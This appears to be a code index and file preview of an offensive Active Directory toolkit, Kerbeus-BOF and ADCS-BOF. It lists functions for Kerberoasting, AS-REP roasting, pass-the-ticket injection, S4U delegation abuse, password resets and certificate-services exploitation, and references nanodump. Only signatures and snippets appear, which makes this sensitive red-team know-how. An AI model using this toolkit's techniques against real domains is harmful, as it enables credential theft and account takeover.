function AsnKrbCredEncode (line 1097) | bool AsnKrbCredEncode(KRB_CRED* krb_cred, AsnElt* finalContext) {
function AsnADEncode (line 1146) | bool AsnADEncode(ADIfRelevant* adif, AsnElt** finalContext) {
function AsnADRestrictionEntryEncode (line 1158) | bool AsnADRestrictionEntryEncode(ADRestrictionEntry* adre, AsnElt* final...
function AsnADIfRelevantEncode (line 1179) | bool AsnADIfRelevantEncode(ADIfRelevant* adif, AsnElt* finalContext) {
function ReqToAsnEncode (line 1210) | bool ReqToAsnEncode(AS_REQ as_req, int APP_NUM, AsnElt* totalSeqApp) {
function AsnEncKrbPrivPartEncode (line 1256) | bool AsnEncKrbPrivPartEncode(EncKrbPrivPart* privPart, AsnElt* totalSeq) {
function AsnKrbPrivEncode (line 1317) | bool AsnKrbPrivEncode(KRB_PRIV* privPart, AsnElt* totalSeq) {
FILE: AD-BOF/Kerbeus-BOF/_include/beacon.h
type datap (line 39) | typedef struct {
type formatp (line 54) | typedef struct {
type HEAP_RECORD (line 103) | typedef struct {
type ALLOCATED_MEMORY_PURPOSE (line 110) | typedef enum {
type ALLOCATED_MEMORY_LABEL (line 120) | typedef enum {
type ALLOCATED_MEMORY_ALLOCATION_METHOD (line 132) | typedef enum {
type HEAPALLOC_INFO (line 149) | typedef struct _HEAPALLOC_INFO {
type MODULESTOMP_INFO (line 154) | typedef struct _MODULESTOMP_INFO {
type ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION (line 158) | typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
type ALLOCATED_MEMORY_CLEANUP_INFORMATION (line 164) | typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
type ALLOCATED_MEMORY_SECTION (line 170) | typedef struct _ALLOCATED_MEMORY_SECTION {
type ALLOCATED_MEMORY_REGION (line 180) | typedef struct _ALLOCATED_MEMORY_REGION {
type ALLOCATED_MEMORY (line 190) | typedef struct {
type BEACON_INFO (line 218) | typedef struct {
type DATA_STORE_OBJECT (line 265) | typedef struct {
type SYSCALL_API_ENTRY (line 283) | typedef struct
type SYSCALL_API (line 290) | typedef struct
type RTL_API (line 337) | typedef struct
type BEACON_SYSCALLS (line 348) | typedef struct
type USER_DATA (line 391) | typedef struct
FILE: AD-BOF/Kerbeus-BOF/_include/connection.c
function UINT (line 3) | UINT my_htonl(UINT hostlong) {
function UINT (line 11) | UINT my_ntohl(UINT netlong) {
function sendBytes (line 15) | void sendBytes(char* server, char* port, PBYTE content, int contentSize,...
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_b64.c
function base64_decode_char (line 37) | int base64_decode_char(char c) {
function byte (line 51) | byte* base64_decode(byte* input, int* output_len) {
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_checksum.c
function BOOL (line 4) | BOOL checksum(byte* key, int key_length, byte* data, int data_length, in...
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_dec.c
function BOOL (line 4) | BOOL decrypt(byte* key, DWORD eType, DWORD keyUsage, byte* data, int dat...
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_enc.c
function BOOL (line 4) | BOOL encrypt(byte* rawBytes, int rawSize, byte* key, DWORD eType, int ke...
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_key.c
function BOOL (line 4) | BOOL char2unicode(char* source, UNICODE_STRING* result) {
function BOOL (line 11) | BOOL get_key_rc4(char* password, byte** hash, int* size) {
function BOOL (line 39) | BOOL get_key_aes128(char* domain, char* username, char* password, byte**...
function BOOL (line 105) | BOOL get_key_aes128_with_salt(char* domain, char* username, char* passwo...
function BOOL (line 182) | BOOL get_key_aes256_with_salt(char* domain, char* username, char* passwo...
function BOOL (line 261) | BOOL get_key_aes256(char* domain, char* username, char* password, byte**...
FILE: AD-BOF/Kerbeus-BOF/_include/functions.c
type LOGON_SESSION_DATA (line 16) | typedef struct _LOGON_SESSION_DATA {
type CONST (line 21) | typedef CONST UNICODE_STRING
type KERB_ECRYPT (line 32) | typedef struct _KERB_ECRYPT {
type KERB_CHECKSUM (line 63) | typedef struct _KERB_CHECKSUM {
type addrinfo (line 88) | struct addrinfo
type addrinfo (line 88) | struct addrinfo
type addrinfo (line 94) | struct addrinfo
type WINADVAPI (line 118) | typedef WINADVAPI BOOL (WINAPI* _ConvertSidToStringSidA)(PSID Sid,LPSTR ...
type WINADVAPI (line 119) | typedef WINADVAPI BOOL (__stdcall* _SystemFunction036)(_Out_writes_bytes...
type WINADVAPI (line 120) | typedef WINADVAPI BOOL (WINAPI* _GetTokenInformation)(HANDLE TokenHandle...
type WINADVAPI (line 121) | typedef WINADVAPI BOOL (WINAPI* _OpenThreadToken)(HANDLE ThreadHandle, D...
type WINADVAPI (line 122) | typedef WINADVAPI BOOL (WINAPI* _OpenProcessToken)(HANDLE ProcessHandle,...
type WINADVAPI (line 123) | typedef WINADVAPI BOOL (WINAPI* _AllocateAndInitializeSid)(PSID_IDENTIFI...
type WINADVAPI (line 124) | typedef WINADVAPI BOOL (WINAPI* _EqualSid)(PSID pSid1, PSID pSid2);
type WINADVAPI (line 125) | typedef WINADVAPI PVOID (WINAPI* _FreeSid)(PSID pSid);
type WINBASEAPI (line 127) | typedef WINBASEAPI NTSTATUS (WINAPI* _LsaConnectUntrusted)(PHANDLE LsaHa...
type WINBASEAPI (line 128) | typedef WINBASEAPI NTSTATUS (WINAPI* _LsaRegisterLogonProcess)(PLSA_STRI...
type WINBASEAPI (line 129) | typedef WINBASEAPI NTSTATUS (WINAPI* _LsaGetLogonSessionData)(PLUID Logo...
type WINBASEAPI (line 130) | typedef WINBASEAPI NTSTATUS (WINAPI* _LsaEnumerateLogonSessions)(PULONG ...
type WINBASEAPI (line 131) | typedef WINBASEAPI NTSTATUS (NTAPI* _LsaFreeReturnBuffer)(PVOID Buffer);
type WINBASEAPI (line 132) | typedef WINBASEAPI NTSTATUS (WINAPI* _LsaCallAuthenticationPackage)(HAND...
type WINBASEAPI (line 133) | typedef WINBASEAPI NTSTATUS (NTAPI* _LsaDeregisterLogonProcess)(HANDLE L...
type WINBASEAPI (line 134) | typedef WINBASEAPI NTSTATUS (WINAPI* _LsaLookupAuthenticationPackage)(HA...
type WINBASEAPI (line 135) | typedef WINBASEAPI DWORD (WINAPI * _InitializeSecurityContextA)(PCredHan...
type WINBASEAPI (line 136) | typedef WINBASEAPI SECURITY_STATUS (WINAPI* _DeleteSecurityContext)(PCtx...
type WINBASEAPI (line 137) | typedef WINBASEAPI SECURITY_STATUS (WINAPI* _FreeCredentialsHandle)(PCre...
type WINBASEAPI (line 138) | typedef WINBASEAPI SECURITY_STATUS (WINAPI* _AcquireCredentialsHandleA)(...
function LPVOID (line 177) | LPVOID MemAlloc(SIZE_T dwBytes) {
function MemCpy (line 183) | void MemCpy(PBYTE d, PBYTE s, DWORD n) {
function FreeBank (line 188) | void FreeBank() {
function SEND_OUT (line 195) | void SEND_OUT(BOOL done) {
function INIT_BOF (line 210) | int INIT_BOF() {
function PRINT_OUT (line 216) | void PRINT_OUT(char* format, ...) {
function END_BOF (line 249) | void END_BOF() {
function BOOL (line 253) | BOOL LoadFunc() {
function my_strncmp (line 372) | int my_strncmp(const char* s1, const char* s2, int len) {
function my_strcmp (line 382) | int my_strcmp(const char* s1, const char* s2) {
function my_strfind (line 390) | int my_strfind(const char* s, char c) {
function my_strlen (line 402) | int my_strlen(char* str) {
function BOOL (line 411) | BOOL my_copybuf(byte** dst, byte* src, size_t size) {
function my_toupper (line 422) | char my_toupper(char c) {
function my_tolower (line 429) | char my_tolower(char c) {
function my_tohex (line 436) | int my_tohex(byte* bytes, int length, char** hexString, int retLength) {
function my_strgetcount (line 450) | int my_strgetcount( char* str, char c ) {
function StrToUpper (line 481) | void StrToUpper(char* str) {
function StrToLower (line 488) | void StrToLower(char* str) {
function GetDomainInfo (line 495) | void GetDomainInfo(char** domain, char** dc) {
function GetStrParam (line 512) | int GetStrParam(PCHAR buffer, DWORD bufferLength, PCHAR param, DWORD par...
function IsSetParam (line 524) | int IsSetParam( PCHAR buffer, DWORD bufferLength, PCHAR param, DWORD par...
FILE: AD-BOF/Kerbeus-BOF/_include/kerb_struct.h
type uint (line 3) | typedef unsigned int uint;
type byte (line 4) | typedef unsigned char byte;
type KRB_KEY_USAGE (line 12) | enum KRB_KEY_USAGE {
type KERB_CHECKSUM_ALGORITHM (line 27) | enum KERB_CHECKSUM_ALGORITHM {
type KERB_ETYPE (line 37) | enum KERB_ETYPE {
type HostAddressType (line 59) | enum HostAddressType {
type KERB_MESSAGE_TYPE (line 86) | enum KERB_MESSAGE_TYPE {
type PADATA_TYPE (line 101) | enum PADATA_TYPE {
type KdcOptions (line 145) | enum KdcOptions {
type PRINCIPAL_TYPE (line 173) | enum PRINCIPAL_TYPE {
type ASN_TYPES (line 185) | enum ASN_TYPES {
type TICKET_FLAGS (line 225) | enum TICKET_FLAGS {
type PacInfoBufferType (line 247) | enum PacInfoBufferType {
function byte (line 265) | byte* lookupKadminErrorCode(uint errorCode) {
type AsnElt (line 388) | typedef struct AsnElt {
type DateTime (line 403) | typedef struct {
type ADKerbLocal (line 414) | typedef struct _ADKerbLocal {
type ADRestrictionEntry (line 422) | typedef struct _ADRestrictionEntry {
type ADIfRelevant (line 431) | typedef struct _ADIfRelevant {
type Checksum (line 439) | typedef struct _Checksum {
type ETYPE_INFO2_ENTRY (line 445) | typedef struct _ETYPE_INFO2_ENTRY {
type HostAddress (line 450) | typedef struct _HostAddress {
type EncryptedData (line 455) | typedef struct _EncryptedData {
type PrincipalName (line 462) | typedef struct _PrincipalName {
type Ticket (line 468) | typedef struct _Ticket {
type KDCReqBody (line 475) | typedef struct _KDCReqBody {
type S4UUserID (line 492) | typedef struct _S4UUserID {
type KERB_PA_PAC_REQUEST (line 499) | typedef struct _KERB_PA_PAC_REQUEST {
type PA_S4U_X509_USER (line 503) | typedef struct _PA_S4U_X509_USER {
type PA_KEY_LIST_REQ (line 508) | typedef struct _PA_KEY_LIST_REQ {
type PA_FOR_USER (line 512) | typedef struct _PA_FOR_USER {
type PA_PAC_OPTIONS (line 519) | typedef struct _PA_PAC_OPTIONS {
type PA_DATA (line 523) | typedef struct _PA_DATA {
type LastReq (line 528) | typedef struct _LastReq {
type EncryptionKey (line 533) | typedef struct _EncryptionKey {
type DmsaKeyPackage (line 539) | typedef struct _DmsaKeyPackage {
type EncryptedPAData (line 548) | typedef struct _EncryptedPAData {
type EncKDCRepPart (line 556) | typedef struct _EncKDCRepPart {
type KrbCredInfo (line 571) | typedef struct _KrbCredInfo {
type EncKrbCredPart (line 584) | typedef struct _EncKrbCredPart {
type KRB_CRED (line 589) | typedef struct _KRB_CRED {
type Authenticator (line 597) | typedef struct _Authenticator {
type AuthorizationData (line 608) | typedef struct _AuthorizationData {
type TransitedEncoding (line 614) | typedef struct _TransitedEncoding {
type EncTicketPart (line 620) | typedef struct _EncTicketPart {
type EncKrbPrivPart (line 634) | typedef struct _EncKrbPrivPart {
type KRB_PRIV (line 642) | typedef struct _KRB_PRIV {
type AS_REQ (line 651) | typedef struct _AS_REQ {
type AS_REP (line 659) | typedef struct _AS_REP {
type AP_REQ (line 670) | typedef struct _AP_REQ {
type TGS_REP (line 680) | typedef struct _TGS_REP {
FILE: AD-BOF/Kerbeus-BOF/asktgs/asktgs.c
function DisplayTicket (line 8) | void DisplayTicket( KRB_CRED cred, int indentLevel ) {
function DescribeTicket (line 58) | void DescribeTicket(byte* ticket_b64) {
function HANDLE (line 71) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 80) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 88) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 123) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 138) | int my_isdigit(int c) {
function my_islower (line 142) | int my_islower(int c) {
function my_strtol (line 146) | long int my_strtol(const char* str, char** endptr, int base) {
function PTT (line 186) | void PTT(char* luid, byte* ticket) {
function byte (line 247) | byte* ADRestrictionEntry_buildTokenStruct(uint flags, uint tokenIL) {
function BOOL (line 264) | BOOL New_PA_DATA_s4uX509user(EncryptionKey key, char* name, char* realm,...
function BOOL (line 306) | BOOL New_PA_DATA_s4u2self(EncryptionKey key, char* name, char* realm, PA...
function BOOL (line 345) | BOOL New_PA_DATA_KeyListReq(int eType, PA_DATA* pa_data) {
function BOOL (line 354) | BOOL New_PA_DATA_options(BOOL claims, BOOL branch, BOOL fullDC, BOOL rbc...
function BOOL (line 367) | BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, Encry...
function BOOL (line 414) | BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
function BOOL (line 453) | BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket provid...
function BOOL (line 791) | BOOL TGS(char* userName, char* domain, Ticket providedTicket, Encryption...
function BOOL (line 1009) | BOOL AskTGS(KRB_CRED kirbi, char* service, int requestEType, char* dc, b...
function AskTGSExecute (line 1026) | void AskTGSExecute(byte* ticket, char* service, int requestEType, char* ...
function ASK_TGS_RUN (line 1039) | void ASK_TGS_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 1099) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/asktgt/asktgt.c
function HANDLE (line 8) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 17) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 25) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 60) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 75) | int my_isdigit(int c) {
function my_islower (line 79) | int my_islower(int c) {
function my_strtol (line 83) | long int my_strtol(const char* str, char** endptr, int base) {
function PTT (line 123) | void PTT(char* luid, byte* ticket) {
function BOOL (line 184) | BOOL NewAS_REP(AsnElt asn_AS_REP, AS_REP* as_rep) {
function BOOL (line 228) | BOOL HandleASREP(AsnElt responseAsn, EncryptionKey encKey, byte* service...
function BOOL (line 300) | BOOL NewAS_REQ( char* pcUsername, char* pcDomain, EncryptionKey encKey, ...
function BOOL (line 438) | BOOL CreateEncKey(char* domain, char* user, char* password, int currentE...
function BOOL (line 466) | BOOL NoPreAuthTGT(char* user, char* domain, EncryptionKey encKey, char* ...
function BOOL (line 552) | BOOL AskTGT_hash(char* user, char* domain, char* password, int currentEt...
function ASK_TGT_RUN (line 604) | void ASK_TGT_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 699) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/asreproasting/asreproasting.c
function BOOL (line 6) | BOOL NewAS_REP(AsnElt asn_AS_REP, AS_REP* as_rep) {
function BOOL (line 50) | BOOL NewAS_REQ_ROAST(char* pcUsername, char* pcDomain, int etype, AS_REQ...
function GetASRepHash (line 97) | void GetASRepHash(char* userName, char* domain, char* domainController, ...
function ASREPROAST_RUN (line 231) | void ASREPROAST_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 264) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/changepw/changepw.c
function ResetUserPassword (line 7) | void ResetUserPassword(byte* ticket, char* newPassword, char* dc, char* ...
function CHANGEPW_RUN (line 213) | void CHANGEPW_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 247) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/describe/describe.c
function DisplayTicket (line 4) | void DisplayTicket( KRB_CRED cred, int indentLevel ) {
function DescribeTicket (line 54) | void DescribeTicket(byte* ticket_b64) {
function DESCRIBE_RUN (line 65) | void DESCRIBE_RUN( PCHAR Buffer, IN DWORD Length ) {
function VOID (line 78) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/hash/hash.c
function GenerateHashes (line 4) | void GenerateHashes(char* user, char* domain, char* password) {
function HASH_RUN (line 40) | void HASH_RUN( PCHAR Buffer, IN DWORD Length ) {
function VOID (line 59) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/kerberoasting/kerberoasting.c
function DisplayTGShash (line 7) | void DisplayTGShash(KRB_CRED cred, BOOL kerberoastDisplay, char* kerbero...
function BOOL (line 67) | BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, Encry...
function BOOL (line 101) | BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
function BOOL (line 140) | BOOL NewAS_REP(AsnElt asn_AS_REP, AS_REP* as_rep) {
function BOOL (line 184) | BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket provid...
function BOOL (line 267) | BOOL TGS(char* userName, char* domain, Ticket providedTicket, Encryption...
function BOOL (line 373) | BOOL NewAS_REQ( char* pcUsername, char* pcDomain, EncryptionKey encKey, ...
function BOOL (line 443) | BOOL GetTGSRepHash(char* ticket, char* spn, char* userName, char* domain...
function BOOL (line 485) | BOOL GetTGSRepHash_nopreauth(char* nopreauth, char* spn, char* userName,...
function Kerberoast (line 565) | void Kerberoast(char* spn, char* domain, char* dc, char* TGT, char* nopr...
function KERBEROAST_RUN (line 578) | void KERBEROAST_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 614) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/klist/klist.c
function SYSTEMTIME (line 3) | SYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li) {
function HANDLE (line 12) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 21) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 29) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 64) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function BOOL (line 79) | BOOL GetLogonSessionData(LUID luid, LOGON_SESSION_DATA* data) {
function ExtractTicket (line 144) | bool ExtractTicket(HANDLE hLsa, ULONG authPackage, LUID luid, UNICODE_ST...
function PrintTicketInfo (line 173) | void PrintTicketInfo(KERB_TICKET_CACHE_INFO_EX cacheInfo, LUID luid) {
function PrintLogonSessionData (line 231) | void PrintLogonSessionData(SECURITY_LOGON_SESSION_DATA data) {
function my_isdigit (line 259) | int my_isdigit(int c) {
function my_islower (line 263) | int my_islower(int c) {
function my_strtol (line 267) | long int my_strtol(const char* str, char** endptr, int base) {
function KLIST (line 307) | void KLIST( char* luid, char* targetService, char* targetUser, char* tar...
function KLIST_RUN (line 454) | void KLIST_RUN( PCHAR Buffer, IN DWORD Length ) {
function VOID (line 473) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/ptt/ptt.c
function base64_decode_char (line 3) | int base64_decode_char(char c) {
function byte (line 17) | byte* base64_decode(byte* input, int* output_len) {
function HANDLE (line 56) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 65) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 73) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 108) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 123) | int my_isdigit(int c) {
function my_islower (line 127) | int my_islower(int c) {
function my_strtol (line 131) | long int my_strtol(const char* str, char** endptr, int base) {
function PTT (line 171) | void PTT(char* luid, byte* ticket) {
function PTT_RUN (line 230) | void PTT_RUN( PCHAR Buffer, IN DWORD Length ) {
function VOID (line 247) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/purge/purge.c
function HANDLE (line 3) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 12) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 20) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 55) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 70) | int my_isdigit(int c) {
function my_islower (line 74) | int my_islower(int c) {
function my_strtol (line 78) | long int my_strtol(const char* str, char** endptr, int base) {
function PURGE (line 118) | void PURGE(char* luid) {
function PURGE_RUN (line 169) | void PURGE_RUN( PCHAR Buffer, IN DWORD Length ) {
function VOID (line 180) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/renew/renew.c
function HANDLE (line 8) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 17) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 25) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 60) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 75) | int my_isdigit(int c) {
function my_islower (line 79) | int my_islower(int c) {
function my_strtol (line 83) | long int my_strtol(const char* str, char** endptr, int base) {
function PTT (line 123) | void PTT(char* luid, byte* ticket) {
function BOOL (line 182) | BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
function BOOL (line 222) | BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, Encry...
function BOOL (line 256) | BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket provid...
function BOOL (line 331) | BOOL AskTGT_ticket(char* userName, char* domain, Ticket providedTicket, ...
function BOOL (line 436) | BOOL ReNewTGT(byte* ticket, char* dc, BOOL ptt) {
function RENEW_RUN (line 458) | void RENEW_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 484) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/s4u/cross_s4u.c
function DisplayTicket (line 9) | void DisplayTicket( KRB_CRED cred, int indentLevel ) {
function DescribeTicket (line 59) | void DescribeTicket(byte* ticket_b64) {
function HANDLE (line 71) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 80) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 88) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 123) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 138) | int my_isdigit(int c) {
function my_islower (line 142) | int my_islower(int c) {
function my_strtol (line 146) | long int my_strtol(const char* str, char** endptr, int base) {
function PTT (line 186) | void PTT(char* luid, byte* ticket) {
function byte (line 247) | byte* ADRestrictionEntry_buildTokenStruct(uint flags, uint tokenIL) {
function BOOL (line 264) | BOOL New_PA_DATA_s4uX509user(EncryptionKey key, char* name, char* realm,...
function BOOL (line 302) | BOOL New_PA_DATA_s4u2self(EncryptionKey key, char* name, char* realm, PA...
function BOOL (line 341) | BOOL New_PA_DATA_KeyListReq(int eType, PA_DATA* pa_data) {
function BOOL (line 350) | BOOL New_PA_DATA_options(BOOL claims, BOOL branch, BOOL fullDC, BOOL rbc...
function BOOL (line 363) | BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, Encry...
function BOOL (line 410) | BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
function BOOL (line 449) | BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket provid...
function BOOL (line 747) | BOOL NewTGS_target_REQ(char* userName, char* user, char* domain, char* t...
function BOOL (line 813) | BOOL TGS(char* userName, char* domain, Ticket providedTicket, Encryption...
function BOOL (line 929) | BOOL S4U2Proxy(KRB_CRED kirbi, char* targetUser, char* targetSPN, char* ...
function BOOL (line 1276) | BOOL CrossDomainS4U2Self(char* userName, char* user, char* domain, char*...
function BOOL (line 1386) | BOOL CrossDomainS4U2Proxy(char* userName, char* user, char* domain, char...
function CrossDomainS4U (line 1553) | void CrossDomainS4U(KRB_CRED kirbi, char* targetUser, char* targetSPN, c...
function S4UExecute_Ticket (line 1607) | void S4UExecute_Ticket(byte* ticket, char* targetUser, char* targetSPN, ...
function ASK_S4U_RUN (line 1655) | void ASK_S4U_RUN( PCHAR Buffer, DWORD Length ) {
function VOID (line 1734) | VOID go( IN PCHAR Buffer, IN ULONG Length ) {
FILE: AD-BOF/Kerbeus-BOF/s4u/s4u.c
function DisplayTicket (line 8) | void DisplayTicket( KRB_CRED cred, int indentLevel ) {
function DescribeTicket (line 58) | void DescribeTicket(byte* ticket_b64) {
function HANDLE (line 70) | HANDLE GetCurrentToken(DWORD DesiredAccess) {
function LUID (line 79) | LUID GetCurrentLUID(HANDLE TokenHandle) {
function BOOL (line 87) | BOOL IsSystem(HANDLE TokenHandle) {
function BOOL (line 122) | BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
function my_isdigit (line 137) | int my_isdigit(int c) {
function my_islower (line 141) | int my_islower(int c) {
function my_strtol (line 145) | long int my_strtol(const char* str, char** endptr, int base) {
function PTT (line 185) | void PTT(char* luid, byte* ticket) {
function byte (line 247) | byte* ADRestrictionEntry_buildTokenStruct(uint flags, uint tokenIL) {
function BOOL (line 264) | BOOL New_PA_DATA_s4uX509user(EncryptionKey key, char* name, char* realm,...
function BOOL (line 302) | BOOL New_PA_DATA_s4u2self(EncryptionKey key, char* name, char* realm, PA...
function BOOL (line 341) | BOOL New_PA_DATA_KeyListReq(int eType, PA_DATA* pa_data) {
function BOOL (line 350) | BOOL New_PA_DATA_options(BOOL claims, BOOL branch, BOOL fullDC, BOOL rbc...
function BOOL (line 363) | BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, Encry...
function BOOL (line 410) | BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
function BOOL (line 449) | BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket provid...
function BOOL (line 747) | BOOL S4U2Self(KRB_CRED kirbi, char* targetUser,
Copy disabled (too large)
Download .json
Condensed preview — 444 files, each showing path, character count, and a content snippet. Download the .json file for the full structured content (10,453K chars).
[
{
"path": ".gitignore",
"chars": 102,
"preview": "_bin\n.vscode\n.cache/jb\nSAL-BOF/vulndrivers.h\nCreds-BOF/nanodump/dist/\n\n# macOS\n.DS_Store\n**/.DS_Store\n"
},
{
"path": "AD-BOF/ADCS-BOF/ADCS.axs",
"chars": 8056,
"preview": "var metadata = {\n name: \"ADCS-BOF\",\n description: \"Active Directory Certificate Services Exploitation BOFs\"\n};\n\nle"
},
{
"path": "AD-BOF/ADCS-BOF/Makefile",
"chars": 1147,
"preview": "CC64 = x86_64-w64-mingw32-gcc\nSTRIP64 = x86_64-w64-mingw32-strip --strip-unneeded\nCFLAGS = -I ../../_include -w -Wno-inc"
},
{
"path": "AD-BOF/ADCS-BOF/README.md",
"chars": 3030,
"preview": "# ADCS-BOF\n\nA library of beacon object files to interact with ADCS servers and certificates.\n\n\n\n## certi auth\n\nAuthentic"
},
{
"path": "AD-BOF/ADCS-BOF/src/auth/certi_auth.c",
"chars": 138551,
"preview": "#define WIN32_LEAN_AND_MEAN\n#define _WINSOCK_DEPRECATED_NO_WARNINGS\n\n#include <windows.h>\n#include <winsock2.h>\n#include"
},
{
"path": "AD-BOF/ADCS-BOF/src/enum/adcs_enum_com2.c",
"chars": 52901,
"preview": "#include <windows.h>\n#include <stdio.h>\n#include <oleauto.h>\n#include <wchar.h>\n#include <io.h>\n#include <fcntl.h>\n#incl"
},
{
"path": "AD-BOF/ADCS-BOF/src/enum/adcs_enum_com2.h",
"chars": 1001,
"preview": "#pragma once\n#define WIN32_WINNT 0x0601\n#include <windows.h>\n#include <certcli.h>\n#include \"certenroll.h\"\n#include <stdi"
},
{
"path": "AD-BOF/ADCS-BOF/src/enum/base.c",
"chars": 6925,
"preview": "#include <windows.h>\n#include \"bofdefs.h\"\n#include \"beacon.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n\n\n\nchar * out"
},
{
"path": "AD-BOF/ADCS-BOF/src/enum/certenroll.h",
"chars": 917236,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/enum/entry.c",
"chars": 884,
"preview": "#include <windows.h>\n#include <stdio.h>\n#define DYNAMIC_LIB_COUNT 4\n#include \"beacon.h\"\n#include \"bofdefs.h\"\n#include \"b"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/CertCli.h",
"chars": 62669,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/CertPol.h",
"chars": 19759,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/adcs_request.c",
"chars": 35450,
"preview": "#include <windows.h>\n#include <stdio.h>\n#include <oleauto.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <combaseapi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/adcs_request.h",
"chars": 1148,
"preview": "#pragma once\n#define WIN32_WINNT 0x0601\n#include <windows.h>\n#include \"CertCli.h\" // from /mnt/hgfs/git/external/win"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/base.c",
"chars": 8753,
"preview": "#include <windows.h>\n#include \"bofdefs.h\"\n#include \"beacon.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n//#pragma GCC"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/certca.h",
"chars": 90193,
